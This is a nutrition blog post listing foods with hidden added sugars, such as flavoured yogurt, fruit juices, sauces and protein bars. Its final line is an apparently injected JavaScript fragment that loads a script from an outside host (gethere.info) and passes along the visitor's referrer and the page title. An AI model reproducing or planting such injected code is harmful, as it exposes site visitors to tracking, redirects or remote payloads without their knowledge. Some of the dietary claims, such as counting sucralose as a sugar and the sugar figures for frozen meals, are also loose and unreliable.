“I have cut down sugars from my diet, I know it is bad for health!” most commonly heard sentence everywhere. Sugar is considered to be big trouble causing entity affecting your health. But as a nutritionist when I look upon closely, I feel people are just thinking about the direct form of crystal sugar or sugar from sweets. But what about the hidden sugar sources contributing to ill effects? Most of us are not aware about that.
Today everything is explained with sugarcoating so that next person should fall for it. Similar way, sugar is coated or decked-up by maltodextrin, corn syrup. Sucralose etc. In this type of refined or processed sugar all the nutrition value of that product depletes leaving behind only empty calories contributing to fat content in our body.
- Healthy Oat Meals: Healthy oat cereals are considered to be the ideal breakfast which is rich in fibers, less in calories and gives you feeling of fullness. Naturally these oats do not have sugars but to taste these cereals better and not boring they are flavored with different flavorings and also added with 10-15 gms of sugars.
- Salad Dressings: Typically we always go for low-fat or fat-free versions of salad dressings. But we are not aware of the fact that these dressings are added with lots of salt and sugars to compensate the taste which is lost after cutting the fat content. May it be the ketch-up based dressings like Barbeque sauce used for grilling, or pizza sauce, these are also added with sugars to reduce the tanginess of the sauces.
- Flavored Yogurt: Yogurt is counted in healthy food stuff due to its rich content of protein and calcium and also due to its probiotic nature. But it is healthy till the time it not flavored. Naturally yogurt has sugar in the form of lactose and plus when it is flavored especially with fruit flavors, then you must watch out for the sugar content of it.
- Canned Fruits: Naturally fruits also have sugar content in it but it comes along with fibers so it is not harmful to health, but these canned fruits are packed along with high fructose corn syrup to increase its shelf life. So sugar content may increase more than 30 gms per serving, which definitely you watch out for.
- Fruit Drinks: We normally think that it’s a fruit juice so it has to be healthy and naturally squeezed juices. But fruit juices available in markets are made from fruit concentrates which also need sugars to be added to avoid the blandness of fruits. So around 20-30 gms of sugars is added per serving of fruit juice.
- Frozen Meals/ ready to cook meals: You must be thinking that how come frozen vegetables or meal has sugars? But to increase the shelf life of products excess salt and sugar is added in the product. So around 20-30 gm sugar content is seen in them.
- Coffee Drinks/ Chocolate Drinks: Black coffee or natural chocolate do not have much of sugar in it. But when it is flavored and various drinks are prepared from it, sweetness has to be increased by adding sugar into it.
- Sweetened tea: Naturally tea is sugar-free but when you select sweetened tea or flavored ice tea then additional sugar makes it unsuitable for sugar watchers.
- Protein Bars: these protein bars are definitely a good snack for weight watchers but to make it look delicious and attractive, around 5-10 gm of sugar is added in these bars
- Jelly and fruit Jams: It is made up of fruit so it is healthy, this is commonly seen but high fructose sugar syrup and fruit concentrates are added to prepare these jelly and jams so definitely not friendly food which can be taken ample.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;